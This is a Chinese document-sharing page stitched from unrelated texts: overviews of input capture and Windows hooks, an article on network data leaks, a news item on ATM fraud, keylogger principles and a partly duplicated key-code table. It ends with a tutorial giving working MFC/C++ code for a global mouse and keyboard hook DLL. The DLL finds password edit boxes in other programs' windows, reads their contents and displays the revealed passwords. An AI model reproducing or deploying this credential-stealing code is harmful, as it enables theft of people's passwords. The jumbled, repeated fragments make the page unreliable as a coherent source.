鼠标键盘钩子截获密码
- 格式:doc
- 大小:31.00 KB
- 文档页数:9
输入捕获总结简介输入捕获是计算机领域中的一项技术,它可以记录和分析用户的输入行为。
输入行为包括键盘输入、鼠标点击、触摸屏操作等。
通过对输入捕获的分析,我们可以更好地了解用户的行为习惯,优化用户体验,提高软件的质量。
输入捕获的原理输入捕获的原理是通过操作系统提供的接口,捕获用户输入的相关信息。
在Windows操作系统中,可以使用钩子(hook)来实现输入捕获。
钩子可以截获特定的Windows消息,例如键盘输入消息(WM_KEYDOWN)、鼠标点击消息(WM_LBUTTONDOWN)等。
当钩子被触发时,可以在回调函数中获取到输入事件的详细信息,例如按下的键盘键码、鼠标点击的坐标等。
输入捕获的应用输入捕获在计算机领域有着广泛的应用。
以下是输入捕获的几个常见应用场景:1. 用户行为分析通过输入捕获,可以收集并分析用户的输入行为,从而了解用户的使用习惯和偏好。
这对于设计产品、优化用户体验非常重要。
例如,在网站的用户行为分析中,可以统计用户的鼠标点击位置和频率,以及键盘输入的内容和速度,从而优化页面布局和交互方式。
2. 安全防护输入捕获可以用于安全防护,例如实现键盘记录器的功能。
键盘记录器可以记录用户在计算机键盘上输入的内容,例如账号密码等敏感信息。
通过输入捕获,可以检测和阻止恶意程序对用户输入信息的获取,提高系统的安全性。
3. 软件调试和性能优化在软件开发过程中,输入捕获对于软件调试和性能优化也非常有帮助。
通过捕获用户的输入行为,可以定位软件中可能存在的bug和性能瓶颈。
例如,在游戏开发中,可以捕获玩家的键盘输入和鼠标点击来优化游戏的响应速度和控制体验。
输入捕获的挑战尽管输入捕获在很多领域都有广泛的应用,但是它也面临一些挑战。
1. 隐私问题由于输入捕获可以记录用户的输入行为,涉及到用户隐私的问题。
当需要使用输入捕获进行用户行为分析时,需要保证用户的个人信息得到合理的保护,遵守相关的法律法规。
2. 兼容性问题不同的操作系统和开发平台提供的输入捕获接口可能存在差异,导致跨平台的兼容性问题。
利用钩子函数来捕捉键盘响应的windows应用程序一:引言:你也许一直对金山词霸的屏幕抓词的实现原理感到困惑,你也许希望将你的键盘,鼠标的活动适时的记录下来,甚至你想知道木马在windows操作系统是怎样进行木马dll的加载的…..其实这些都是用到了windows的钩子函数。
因此本文将对钩子函数的相关知识进行阐述。
当然,本文的目的并不是想通过此程序让读者去窃取别人的密码,只是由于钩子函数在windows系统中是一个非常重要的系统接口函数,所以想和大家共同的探讨,当然本文也对怎样建立动态连结库(DLL)作了一些简单的描述。
(本文的程序为vc6.0的开发环境,语言是:C和win32 api)。
二:钩子概述:微软的windowsX操作系统是建立在事件驱动的机制上的,也就是通过消息传递来实现。
而钩子在windows操作系统中,是一种能在事件(比如:消息、鼠标激活、键盘响应)到达应用程序前中途接获事件的机制。
而且,钩子函数还可以通过修改、丢弃等手段来对事件起作用。
Windows 有两种钩子,一种是特定线程钩子(Thread specific hooks),一种是全局系统钩子(Systemwide hooks)。
特定线程钩子只是监视指定的线程,而全局系统钩子则可以监视系统中所有的线程。
无论是特定线程钩子,还是全局系统钩子,都是通过SetWindowsHookEx ()来设置钩子的。
对于特定线程钩子,钩子的函数既可以是包含在一个.exe也可以是一个.dll。
但是对于一个全局系统钩子,钩子函数必须包含在独立的dll中,因此,当我们要捕捉键盘响应时,我们必须创建一个动态链接库。
但是当钩子函数在得到了控制权,并对相关的事件处理完后,如果想要该消息得以继续的传递,那么则必须调用另一个函数:CallNextHookEx。
由于系统必须对每个消息处理,钩子程序因此增加了处理的负担,因此也降低了系统的性能。
鉴于这一点,在windows ce中对钩子程序并不支持。
C语言中钩子函数和回调函数的区别一、定义1. 钩子函数:钩子函数是在特定事件发生时自动调用的函数,用于拦截和处理这些事件。
在C语言中,钩子函数通常用于实现操作系统的消息处理机制,比如监控键盘、鼠标等输入设备的输入事件。
2. 回调函数:回调函数是作为参数传递给其他函数的函数,用于在特定事件发生时被调用。
在C语言中,回调函数通常用于实现异步操作,比如在网络通信中接收到数据时的处理。
二、调用方式1. 钩子函数:钩子函数是由操作系统或特定的库自动调用的,程序员无法直接调用钩子函数。
2. 回调函数:回调函数是作为参数传递给其他函数的,程序员需要在调用该函数时指定回调函数的名称或指针。
三、作用范围1. 钩子函数:钩子函数对系统的事件进行拦截和处理,可以改变系统的行为。
比如在Windows操作系统中,可以使用钩子函数来拦截键盘输入,实现快捷键功能。
2. 回调函数:回调函数用于在特定事件发生时被调用,通常用于实现异步操作或事件通知。
比如在网络通信中,可以使用回调函数来处理接收到的数据。
四、编程实现1. 钩子函数:在C语言中实现钩子函数通常需要调用操作系统或特定库提供的函数,并注册钩子函数。
钩子函数的实现方式因操作系统和应用场景的不同而异。
2. 回调函数:在C语言中实现回调函数通常需要定义一个函数指针类型,并将回调函数作为参数传递给其他函数。
在特定事件发生时,其他函数会调用指定的回调函数。
以上是C语言中钩子函数和回调函数的区别,虽然它们都涉及到在特定事件发生时调用函数,但是它们的定义、调用方式、作用范围和编程实现方式都有所不同。
深入理解这两种函数的区别对于提高程序员的编程技能和理解系统底层原理是非常有帮助的。
C语言中钩子函数和回调函数的区别继续扩写:五、应用场景1. 钩子函数:钩子函数通常用于监控、拦截和处理系统事件,比如键盘输入、鼠标点击等。
在图形用户界面(GUI)编程中,钩子函数常用于实现快捷键功能、鼠标事件处理等。
易语言鼠标钩子例程-概述说明以及解释1.引言1.1 概述鼠标钩子是一种监控和拦截鼠标消息的技术,可以通过这种技术来实现对用户鼠标操作的监听和控制。
在软件开发中,鼠标钩子可以用于实现各种功能,例如鼠标手势识别、鼠标宏录制、鼠标轨迹跟踪等。
易语言是一种国产的编程语言,具有简单易学的特点,广泛应用于软件开发领域。
本文将介绍易语言中如何实现鼠标钩子功能,并提供一个完整的鼠标钩子例程,帮助读者了解和应用这一技术。
通过学习本文,读者将能够掌握易语言中鼠标钩子的原理和实现方法,从而为自己的软件开发项目增添新的功能和效果。
1.2 文章结构文章结构部分应包含关于整篇文章的框架和重点内容的介绍。
在这部分可以简要描述本文将涵盖的主要内容和重点讨论的方向,以帮助读者更好地理解文章的脉络和逻辑结构。
例如:文章结构部分介绍了本文的整体框架和内容细节安排。
本文将首先介绍鼠标钩子的概念和作用,然后重点讨论在易语言中实现鼠标钩子的方法和步骤。
最后,结论部分将总结易语言鼠标钩子的重要性,并展望其未来发展的前景。
通过这样清晰的结构安排,读者可以更好地理解本文的内容,从而更容易获取所需信息。
1.3 目的本文旨在介绍易语言中鼠标钩子的相关知识和例程,帮助读者了解什么是鼠标钩子以及如何在易语言中实现鼠标钩子功能。
通过本文的阐述,读者可以学习到鼠标钩子的基本原理和编写步骤,进而应用到实际的软件开发中。
同时,本文也旨在强调易语言鼠标钩子的重要性和优势,帮助读者更好地理解和使用该功能,并展望易语言鼠标钩子在未来的发展趋势。
通过本文的阐述,读者可以进一步拓展自己的编程技能,提高自己在软件开发领域的实践能力和经验。
2.正文2.1 什么是鼠标钩子:鼠标钩子(Mouse Hook)是一种用于拦截和监视鼠标消息的技术。
通过安装鼠标钩子,我们可以在鼠标事件发生时对其进行处理,如记录鼠标的移动轨迹、监控鼠标点击操作、实现鼠标手势等功能。
在Windows操作系统中,鼠标钩子是一种底层的系统级编程技术,可以被用来截获和处理鼠标事件。
计算机网络泄密原因分析与对策摘要:21世纪是信息技术主导的时代,网络技术的快速发展便是最好的例证。
随着计算机网络的蓬勃发展,它在给人们带来便利的同时,也因为泄密问题困扰着人们。
维护网络信息的安全需要从网络技术、通信技术、信息安全技术、密码技术、信息论以及计算机科学等诸多方面来综合考量。
在不同时代,威胁网络信息安全的因素也是不同的,相关防范措施也必须与时俱进。
在该文中,笔者就导致计算机网络泄密的因素以及相关防范措施进行了分析。
关键词:计算机;网络泄密;原因;对策在当前,计算机网络不仅仅应用企业当中,更是飞入寻常百姓家,与人们的日常生活结合得更加紧密,但是层出不穷的网络泄密事件严重影响着计算机网络的健康发展。
1常见的网络泄密原因1.1安全漏洞泄密世界上没有完美无缺的系统,任何系统都存在着某些漏洞。
系统漏洞具体表现为:1)入侵用户的操作系统,植入木马非法获取信息。
以特洛依木马术为例,它能够隐藏在正常软件背后,软件在执行预定任务的过程中,木马也会在后台执行非法任务,但是用户却浑然不知。
2)恶意破坏用户的操作系统,阻碍系统的正常运行,病毒便是非常典型的例子,作为一种恶意程序,可以通过复制自身或者再生等感染整个系统,破坏系统数据或者占用系统资源,最终瘫痪系统。
3)阻碍系统预定任务的执行,典型的例子便是逻辑炸弹等。
4)黑客攻击,能够认为修改甚至破坏系统的各项功能,使其不能正常工作甚至瘫痪。
系统漏洞就会成为泄密的重要诱因。
第一,未经授权的非法用户能够利用长期试探、冒名顶替以及其他途径来窃取口令,并窃取重要的信息。
第二,网络规模越的扩大必然导致线路通道分支的增加,输送信息的区域也会随之扩大,这也在无形中为截取信息信号提供了便利。
控制网络中信息流路的难度增加,信息泄露就更加容易,例如,窃密者只需在某条网络分支信道、某个网络节点或者网络终端实施信息截取,能够比较容易地获取整个网络输送的全部信息。
1.2木马原因泄密木马大多数诞生于黑客(多为计算机高手)之手。
警惕利用银行ATM机作案的十种手法 2007年10月15日 10:18 新华网新华网福州10月15日专电(记者郑良)针对当前不法分子利用银行ATM柜员机进行诈骗、盗窃客户资金等违法犯罪案件频发,福建龙岩警方日前披露该类犯罪的十种常见手法,提醒市民警惕该类犯罪。
龙岩市公安局经济犯罪侦查支队负责人告诉记者,不法分子的骗术主要表现为,骗术一:不法分子冒用银行或发卡机构等金融部门名义,在ATM柜员机上粘贴"温馨提示"等虚假信息"通告",然后用透明胶带塞进ATM柜员机吐钞口,使机器里的钞票无法正常吐出,前来取钱的客户不能取钞,情急之下就会拨打ATM柜员机上粘贴的"通告"提供的"服务热线",被不法分子诱骗进行转账操作。
骗术二:不法分子使用铁钩、镊子、胶带和假键盘等工具,将一个特制的铁钩放入ATM 柜员机的插口,造成银行卡被吞的假象,诱骗客户按提示操作,泄露银行卡密码。
等客户走后,犯罪分子再拉出钩子,取出银行卡窃取现金。
骗术三:在客户使用ATM柜员机取款时,不法分子上前搭话,分散其注意力,设法窃取客户银行卡账户信息和密码或调换客户银行卡。
骗术四:不法分子在键盘上安装盗码器。
目前有一种盗码器能贴在银行提款机的按键上,客户按下的密码会被自动记录下来。
当客户按步骤输入密码,屏幕却显示"此卡被银行保管",之后操作无法继续进行,假键盘背后的电路板可以将取款人输入的密码直接发射出去。
骗术五:不法分子利用假插卡槽作案。
不法分子将假的ATM柜员机插口固定在原来真插口的位置,客户将银行卡插入假插口后,假插卡槽内部设置的读写装置能复制卡上全部信息。
骗术六:不法分子在广告夹里藏摄像镜头。
在一些ATM柜员机旁边有一个广告夹,这个文告夹里可能藏着一个微型摄像机,通过摄像机将键盘和荧屏上的资讯拍下来,并传到200米之外。
骗术七:不法分子在ATM柜员机上安装秘密摄像装置,窃取持卡人密码;同时,捡拾持卡人取款后遗弃的取款凭条获取持卡人卡号,再利用电脑、读写磁机将卡号写入另一张磁卡上,变造银行卡后使用。
输入捕获的原理
输入捕获是指通过程序或设备获取与计算机或系统进行交互的输入信息的过程。
它通常涉及监听和记录键盘、鼠标、触摸屏、摄像头、麦克风等输入设备的操作行为和数据。
输入捕获的原理可以分为以下几个步骤:
1. 按键监听:输入捕获程序或设备会监控键盘输入,包括键盘按键的按下和释放操作。
它可以通过低级别的操作系统API
(如Windows的hook机制)来注册一个键盘钩子,用于监控
和截获键盘消息。
2. 鼠标监听:输入捕获程序或设备会监控鼠标输入,包括鼠标的点击、移动和滚轮事件等。
它可以通过类似的方法来注册一个鼠标钩子,用于监控和截获鼠标消息。
3. 触摸屏监听:输入捕获程序或设备可以通过操作系统提供的触摸屏驱动接口,监听和处理触摸屏所产生的触控事件,如触摸、滑动、缩放等。
4. 设备数据获取:输入捕获程序或设备可以通过读取输入设备的原始数据流来获取更详细的输入信息。
比如,它可以读取鼠标或触摸屏的原始坐标数据、压感数据、按钮状态等。
5. 数据记录和处理:输入捕获程序或设备会将获取到的输入信息进行记录和处理。
记录可以以原始数据的形式保存下来,也可以进行进一步的分析和处理,比如提取关键信息、生成输入
日志等。
需要注意的是,输入捕获程序或设备的工作通常需要在操作系统层面进行,需要相应的权限和许可才能获取和处理输入信息。
此外,为了保护用户的隐私和安全,一些操作系统和应用程序可能会限制或禁止对输入信息进行捕获。
键盘记录原理
键盘记录是一种记录用户键盘输入的技术。
它利用计算机系统内部的软件或硬件机制来截取并记录用户在键盘上按下的按键信息。
键盘记录的原理基于计算机系统对键盘输入的处理过程。
当用户按下键盘上的一个按键时,键盘会发送相应的键码(scan code)给计算机系统。
计算机系统接收到键码后,会进行相应的处理,将键码转换为可识别的字符或命令,并执行相应的操作。
在键盘记录过程中,通常通过拦截键盘输入的接口或钩子技术来实现。
拦截接口可以捕获键盘输入的原始数据,而钩子技术可以截取键盘事件,并在事件处理过程中进行记录。
拦截接口一般由操作系统提供,并通过内核级别实现,因此可以完全截取键盘输入。
钩子技术则可以通过在操作系统中设置键盘事件的钩子函数来实现截取。
当键盘记录器植入计算机系统后,它会在用户按下键盘上的按键时记录按键信息。
记录的信息可以包括按键的时间、按键的键码或字符,以及按键的顺序等。
这些信息会被存储在键盘记录器内部的存储器中,或者被发送到攻击者控制的服务器或存储设备上。
键盘记录技术在一些特定的场景中被使用,比如在调查研究、审计、监控等方面。
然而,它也有潜在的风险,因为攻击者可以通过非法的手段植入键盘记录器来获取用户的敏感信息,如
用户名、密码、信用卡号码等。
为了保护用户的隐私和安全,用户可以采取一些措施来防范键盘记录攻击。
这些措施包括定期检查计算机系统是否受到键盘记录器的攻击、使用安全的密码管理工具、及时更新操作系统和应用程序,以及避免在不可信的计算机上输入敏感信息等。
C#Hook前⾔ 在说C# Hook之前,我们先来说说什么是Hook技术。
相信⼤家都接触过外挂,不管是修改游戏客户端的也好,盗取密码的也罢,它们都是如何实现的呢? 实际上,Windows平台是基于事件驱动机制的,整个系统都是通过消息的传递来实现的。
当进程有响应时(包括响应⿏标和键盘事件),则Windows会向应⽤程序发送⼀个消息给应⽤程序的消息队列,应⽤程序进⽽从消息队列中取出消息并发送给相应窗⼝进⾏处理。
⽽Hook则是Windows消息处理机制的⼀个平台,应⽤程序可以在上⾯设置⼦程以监视指定窗⼝的某种消息,⽽且所监视的窗⼝可以是其他进程所创建的。
当消息到达后,在⽬标窗⼝处理函数之前处理它。
钩⼦机制允许应⽤程序截获处理window消息或特定事件。
所以Hook就可以实现在键盘/⿏标响应后,窗⼝处理消息之前,就对此消息进⾏处理,⽐如监听键盘输⼊,⿏标点击坐标等等。
某些盗号⽊马就是Hook了指定的进程,从⽽监听键盘输⼊了什么内容,进⽽盗取账户密码。
C# Hook 我们知道C#是运⾏在.NET平台之上,⽽且是基于CLR动态运⾏的,所以只能操作封装好的函数,且⽆法直接操作内存数据。
⽽且在C#常⽤的功能中,并未封装Hook相关的类与⽅法,所以如果⽤C#实现Hook,必须采⽤调⽤WindowsAPI的⽅式进⾏实现。
WindowsAPI函数属于⾮托管类型的函数,我们在调⽤时必须遵循以下⼏步: 1、查找包含调⽤函数的DLL,如User32.dll,Kernel32.dll等。
2、将该DLL加载到内存中,并注明⼊⼝ 3、将所需参数转化为C#存在的类型,如指针对应Intptr,句柄对应int类型等等 4、调⽤函数 我们本篇需要使⽤的函数有以下⼏个: SetWindowsHookEx ⽤于安装钩⼦ UnhookWindowsHookEx ⽤于卸载钩⼦ CallNextHookEx 执⾏下⼀个钩⼦ 详细API介绍请参考MSDN官⽅声明 接下来在C#中需要⾸先声明此API函数:[DllImport("user32.dll",CharSet=CharSet.Auto,CallingConvention=CallingConvention.StdCall)]public static extern int SetWindowsHookEx(int idHook, HookProc lpfn,IntPtr hInstance, int threadId);[DllImport("user32.dll",CharSet=CharSet.Auto,CallingConvention=CallingConvention.StdCall)]public static extern bool UnhookWindowsHookEx(int idHook);[DllImport("user32.dll",CharSet=CharSet.Auto,CallingConvention=CallingConvention.StdCall)]public static extern int CallNextHookEx(int idHook, int nCode,IntPtr wParam, IntPtr lParam); 声明后即可实现调⽤,SetWindowsHookEx()把⼀个应⽤程序定义的钩⼦⼦程安装到钩⼦链表中,SetWindowsHookEx函数总是在Hook链的开头安装Hook⼦程。
键盘鼠标对应码表常数名称十六进制值十进制值对应按键VK_LBUTTON011鼠标的左键VK_RBUTTON022鼠标的右键VK-CANCEL033Ctrl+Break通常不需要处理VK_MBUTTON044鼠标的中键三按键鼠标VK_BACK088Backspace键VK_TAB099Tab键VK_CLEAR0C12Clear键Num Lock关闭时的数字键盘5 VK_RETURN0D13Enter键VK_SHIFT1016Shift键VK_CONTROL1117Ctrl键VK_MENU1218Alt键VK_PAUSE1319Pause键VK_CAPITAL1420Caps Lock键VK_ESCAPE1B27Ese键VK_SPACE2032Spacebar键VK_PRIOR2133Page Up键VK_NEXT2234Page Domw键VK_END2335End键VK_HOME2436Home键VK_LEFT2537LEFT ARROW 键←VK_UP2638UP ARROW键↑VK_RIGHT2739RIGHT ARROW键→VK_DOWN2840DOWN ARROW键↓VK_Select2941Select键VK_PRINT2A42VK_EXECUTE2B43EXECUTE键VK_SNAPSHOT2C44Print Screen键抓屏VK_Insert2D45Ins键Num Lock关闭时的数字键盘0 VK_Delete2E46Del键Num Lock关闭时的数字键盘. VK_HELP2F47Help键VK_030480键VK_131491键VK_232502键VK_333513键VK_434524键VK_535535键VK_636546键VK_737557键VK_838568键VK_939579键VK_A4165A键VK_B4266B键VK_C4367C键VK_D4468D键VK_E4569E键VK_F4670F键VK_G4771G键VK_H4872H键VK_I4973I键VK_J4A74J键VK_K4B75K键VK_L4C76L键VK_M4D77M键VK_N4E78N键VK_O4F79O键VK_P5080P键VK_Q5181Q键VK_R5282R键VK_S5383S键VK_T5484T键VK_U5585U键VK_V5686V键VK_W5787W键VK_X5888X键VK_Y5989Y键VK_Z5A90Z键VK_NUMPAD06096数字键0键 VK_NUMPAD16197数字键1键 VK_NUMPAD26298数字键2键 VK_NUMPAD36299数字键3键 VK_NUMPAD464100数字键4键 VK_NUMPAD565101数字键5键VK_NUMPAD666102数字键6键VK_NUMPAD767103数字键7键VK_NUMPAD868104数字键8键VK_NUMPAD969105数字键9键VK_MULTIPLY6A106数字键盘上的*键 VK_ADD6B107数字键盘上的+键VK_SEPARATOR6C108Separator键VK_SUBTRACT6D109数字键盘上的-键 VK_DECIMAL6E110数字键盘上的.键 VK_DIVIDE6F111数字键盘上的/键 VK_F170112F1键VK_F271113F2键VK_F372114F3键VK_F473115F4键VK_F574116F5键VK_F675117F6键VK_F776118F7键VK_F877119F8键VK_F978120F9键VK_F1079121F10键VK_F117A122F11键VK_F127B123F12键VK_NUMLOCK90144Num Lock 键VK_SCROLL91145Scroll Lock键上面没有提到的:都在大键盘VK_LWIN91左win键VK_RWIN92右win键VK_APPS93右Ctrl左边键,点击相当于点击鼠标右键,会弹出快捷菜单 186;分号187=键188,键逗号189-键减号190.键句号191/键192`键Esc下面219[键220\键221]键222‘键引号delphi虚拟键码对应关键VK_LBUTTON鼠标左键VK_RBUTTON鼠标右键VK_CANCEL控制+休息VK_MBUTTON鼠标中键VK_BACK Backspace键VK_TAB Tab键VK_CLEAR清除主要VK_RETURN Enter键VK_SHIFT Shift键VK_CONTROL Ctrl键VK_MENU Alt键VK_PAUSE暂停关键VK_CAPITAL Caps Lock键 VK_KANA可与输入法VK_HANGUL可与输入法VK_JUNJA可与输入法VK_FINAL可与输入法VK_HANJA可与输入法VK_KANJI可与输入法VK_CONVERT可与输入法VK_NONCONVERT可与输入法 VK_ACCEPT可与输入法VK_MODECHANGE可与输入法 VK_ESCAPE Esc键VK_SPACE空间酒吧VK_PRIOR页键VK_NEXT下一页关键VK_END END键VK_HOME主页关键VK_LEFT左箭头键VK_UP向上键VK_RIGHT右箭头键VK_DOWN下箭头键VK_SELECT选择关键VK_PRINT打印键键盘的具体VK_EXECUTE执行关键VK_SNAPSHOT Print Screen键 VK_INSERT插入关键VK_DELETE Delete键VK_HELP帮助关键VK_LWIN左Windows键微软键盘 VK_RWIN右Windows键微软键盘 VK_APPS应用关键微软键盘VK_NUMPAD0 0键数字键盘VK_NUMPAD1 1键数字键盘VK_NUMPAD2 2键数字键盘VK_NUMPAD3 3键数字键盘VK_NUMPAD4 4键数字键盘VK_NUMPAD5 5键数字键盘VK_NUMPAD6 6键数字键盘VK_NUMPAD7 7键数字键盘VK_NUMPAD8 8键数字键盘VK_NUMPAD9 9键数字键盘VK_MULTIPLY多键数字键盘VK_ADD添加键数字键盘VK_SEPARATOR分离键数字键盘 VK_SUBTRACT减去键数字键盘 VK_DECIMAL小数点键数字键盘 VK_DIVIDE鸿沟键数字键盘VK_F1 F1键VK_F2 F2键VK_F3 F3的关键VK_F4 F4键VK_F5 F5键VK_F6 F6键VK_F7 F7键VK_F8 F8键VK_F9 F9键VK_F10 F10键关键VK_F11 F11键VK_F12 F12键VK_F13 F13键VK_F14 F14键VK_F15 F15键VK_F16 F16键VK_F17 F17键VK_F18 F18键VK_F19 F19键VK_F20 F20键VK_F21 F21键VK_F22 F22键VK_F23 F23键VK_F24 F24键VK_NUMLOCK数Lock键 VK_SCROLL滚动Lock键VK_LSHIFT左Shift键仅用于GetAsyncKeyState和GetKeyState VK_RSHIFT右Shift键仅用于GetAsyncKeyState和GetKeyState VK_LCONTROL左Ctrl键仅用于GetAsyncKeyState和GetKeyState VK_RCONTROL右Ctrl键仅用于GetAsyncKeyState和GetKeyState VK_LMENU左Alt键仅用于GetAsyncKeyState和GetKeyStateVK_RMENU右Alt键仅用于GetAsyncKeyState和GetKeyStateVK_PROCESSKEY工艺关键VK_ATTN经办关键VK_CRSEL CrSel关键VK_EXSEL ExSel关键VK_EREOF擦除EOF分析关键VK_PLAY发挥关键VK_ZOOM变焦关键VK_NONAME保留以供将来使用VK_PA1 PA1关键VK_OEM_CLEAR清除主要标签数: 1 “ F14键VK_F15 F15键VK_F16 F16键VK_F17 F17键VK_F18 F18键VK_F19 F19键VK_F20 F20键VK_F21 F21键VK_F22 F22键VK_F23 F23键VK_F24 F24键VK_NUMLOCK数Lock键VK_SCROLL滚动Lock键VK_LSHIFT左Shift键仅用于GetAsyncKeyState和GetKeyState VK_RSHIFT右Shift键仅用于GetAsyncKeyState和GetKeyState VK_LCONTROL左Ctrl键仅用于GetAsyncKeyState和GetKeyState VK_RCONTROL右Ctrl键仅用于GetAsyncKeyState和GetKeyState VK_LMENU左Alt键仅用于GetAsyncKeyState和GetKeyStateVK_RMENU右Alt键仅用于GetAsyncKeyState和GetKeyStateVK_PROCESSKEY工艺关键VK_ATTN经办关键VK_CRSEL CrSel关键VK_EXSEL ExSel关键VK_EREOF擦除EOF分析关键VK_PLAY发挥关键VK_ZOOM变焦关键VK_NONAME保留以供将来使用VK_PA1 PA1关键VK_OEM_CLEAR清除主要感谢您的阅读,祝您生活愉快。
利用鼠标键盘钩子截获密码。
源码示例:/soft/GetPass_Src.rar钩子能截获系统并得理发送给其它应用程序的消息,能完成一般程序无法完成的功能。
掌握钩子的编程方法是很有必要的钩子分类:1、WH_CALLWNDPROC和WH_CALLWNDPROCRET:使你可以监视发送到窗口过程的消息3、WH_DEBUG 调试钩子4、WH_FOREGROUNDIDLE 当当应用程序的前台线程大概要变成空闲状态时,系统就会调用 WH_FOREGROUNDIDL5、WH_JOURNALRECORD 监视和记录输入事件6、WH_JOURNALPLAYBACK 回放用WH_JOURNALRECORD记录事件7、WH_KEYBOARD 键盘钩子9、WH_KEYBOARD_LL 低层键盘钩子10、WH_MOUSE 鼠标钩子11、WH_MOUSE_LL 底层鼠标钩子12、WH_SHELL 外壳钩子13、WH_MSGFILTER 和WH_SYSMSGFILTER 使我们可以监视菜单,滚动条,消息框等安装钩子:调用函数SetWindowsHookEx安装钩子。
其函数原型为:HHOOK SetWindowsHookEx( int idHook,HOOKPROC lpfn, INSTANCE hMod,DWORD dwThreadId )idHook表示钩子类型,它是和钩子函数类型一一对应的。
如,WH_KEYBOARD,WH_MOUSE。
Lpfn是钩子函数的地址。
HMod是钩子函数所在的实例的句柄。
对于线程钩子,该参数为NULL;对于系统钩子,该参数为钩子函数所在的DLL句柄。
(系统钩子必须在DLL中)dwThreadId 指定钩子所监视的线程的线程号。
对于全局钩子,该参数为NULL。
SetWindowsHookEx返回所安装的钩子句柄。
卸载钩子调用函数BOOL UnhookWindowsHookEx( HHOOK hhk)卸载钩子定义钩子函数钩子函数是一种特殊的回调函数。
钩子监视的特定事件发生后,系统会调用钩子函数进行处理。
一般为下:LRESULT WINAPI MyHookProc(int nCode ,WPARAM wParam,LPARAM lParam)参数wParam和lParam包含所钩消息的信息,比如鼠标位置、状态,键盘按键等。
nCode 包含有关消息本身的信,比如是否从消息队列中移出。
实例:下面我们通过安装鼠标钩子。
和键盘钩子还截获输入的密码,并可查看*密码为例,来说明何何使用钩子。
1,进入向导,新建MFC AppWizard(dll) 取名为GetPass,选择MFC Extension DLL,完成。
2,新建一个CGetPassHook 类,基类:CObject,并加入StartHook,StopHook,函数,如下:class AFX_EXT_CLASS CGetPassHook : public CObject{public:BOOL StopHook();BOOL StartHook(HWND hwnd);CGetPassHook();virtual ~CGetPassHook();};3:加入全局共享数据,如下:#pragma data_seg("ShareData")HHOOK hKeyBoardHook=NULL; file://keyboar hookHHOOK hMouseHook=NULL; file://mouse hookHINSTANCE glhInstance=NULL; file://globle instanceHWND hOutPutWnd=NULL; file://Display Pass Wnd#pragma data_seg()4:加入鼠标,键盘钩子处理函数,如下:LRESULT WINAPI MouseHookProc(int nCode,WPARAM wParam ,LPARAM lParam) { file://鼠标钩子得理函数LPMOUSEHOOKSTRUCT lpMouse=(MOUSEHOOKSTRUCT FAR*)lParam;if(nCode>=0){HWND hTargetHwnd=lpMouse->hwnd; file://得到鼠标所在窗口句柄if(hTargetHwnd){LONG style=::GetWindowLong(hTargetHwnd,GWL_STYLE); file://得到它的样式if(style&ES_PASSWORD) file://如果是密码框{char szPass[255];::SendMessage(hTargetHwnd,WM_GETTEXT,255,(LPARAM)szPass);file://得到密码::SendMessage(hOutPutWnd,WM_SETTEXT,0,(LPARAM)szPass);file://显示密码}}}return CallNextHookEx(hMouseHook,nCode,wParam,lParam);file://加上这句,就可以继续传递消息,如果没有,则会取消此消息的传递,file://可以起到截儿消息的目的,我们这里调用之。
}LRESULT WINAPI KeyBoardProc(int nCode,WPARAM wParam,LPARAM lParam) { file://keyboard hook procif(nCode>=0){HWND hTargetHwnd=GetActiveWindow(); file://get active windowif(hTargetHwnd)EnumChildWindows(hTargetHwnd,EnumWndProc,0); file://枚举所有窗口}return CallNextHookEx(hKeyBoardHook,nCode,wParam,lParam);file://加上这句,就可以继续传递消息,如果没有,则会取消此消息的传递,file://可以起到截儿消息的目的,我们这里调用之。
}这里要介绍下EnumChildWindows函数,原形如下:BOOL EnumChildWindows(HWND hWndParent,WINDENUMPROClpEnumFunc,LPARAM lParam);hWndParent:为枚举窗口的句柄lpEnumFunc:枚举函数的地址,lParam:这里为05:加入枚举窗口的函数。
如下:(注意,因为前面的函数据要用到此函数,所以要么在前面声明,要么放在上面函数之前定义。
BOOL WINAPI EnumWndProc(HWND hwnd,LPARAM lParam){ file://enum the child window,find passeditif(hwnd){LONG style=::GetWindowLong(hwnd,GWL_STYLE); file://得到STYLEif(style&ES_PASSWORD) file://是密码框{char szPass[255];::SendMessage(hwnd,WM_GETTEXT,255,(LPARAM)szPass); file://得到PASS::SendMessage(hOutPutWnd,WM_SETTEXT,0,(LPARAM)szPass); file://显示return TRUE;}}return TRUE;}6:在DEF文件中定义段属性:(这步很重要)SECTIONSmydata READ WRITE SHARED7:完成StartHook,StopHook函数,启动/关闭钩子,如下:BOOL CGetPassHook::StartHook(HWND hwnd){ file://install hoookhMouseHook=SetWindowsHookEx(WH_MOUSE,MouseHookProc,glhInstance,0);file://mouse hookhKeyBoardHook=SetWindowsHookEx(WH_KEYBOARD,KeyBoardProc,glhInstance,0); file://keyboard hookif(hMouseHook&&hKeyBoardHook){hOutPutWnd=hwnd; file://显示密码的句柄return TRUE;}return FALSE;}BOOL CGetPassHook::StopHook(){ file://unstall hookBOOL mHook=UnhookWindowsHookEx(hMouseHook);BOOL kHook=UnhookWindowsHookEx(hKeyBoardHook);if(mHook&&kHook)return TRUE;return FALSE;}8:在DLLMAIN函数中得到DLL句柄,要用到glhInstance变量,因此要加入一句,如下:extern HINSTANCE glhInstance; file://记得这里extern "C" int APIENTRYDllMain(HINSTANCE hInstance, DWORD dwReason, LPVOID lpReserved){UNREFERENCED_PARAMETER(lpReserved);if (dwReason == DLL_PROCESS_ATTACH){TRACE0("GETPASS.DLL Initializing!\n");if (!AfxInitExtensionModule(GetPassDLL, hInstance))return 0;new CDynLinkLibrary(GetPassDLL);glhInstance=hInstance; file://得到句柄}else if (dwReason == DLL_PROCESS_DETACH){TRACE0("GETPASS.DLL Terminating!\n");AfxTermExtensionModule(GetPassDLL);}return 1; // ok}9:编译,完成DLL部分,下面建立APP部分。
如下:1:新建MFC AppWizard(exe)命名为GetPassWord,并在第一步中选择Add to Current WorkSpace加入到当前工作区,这样方便。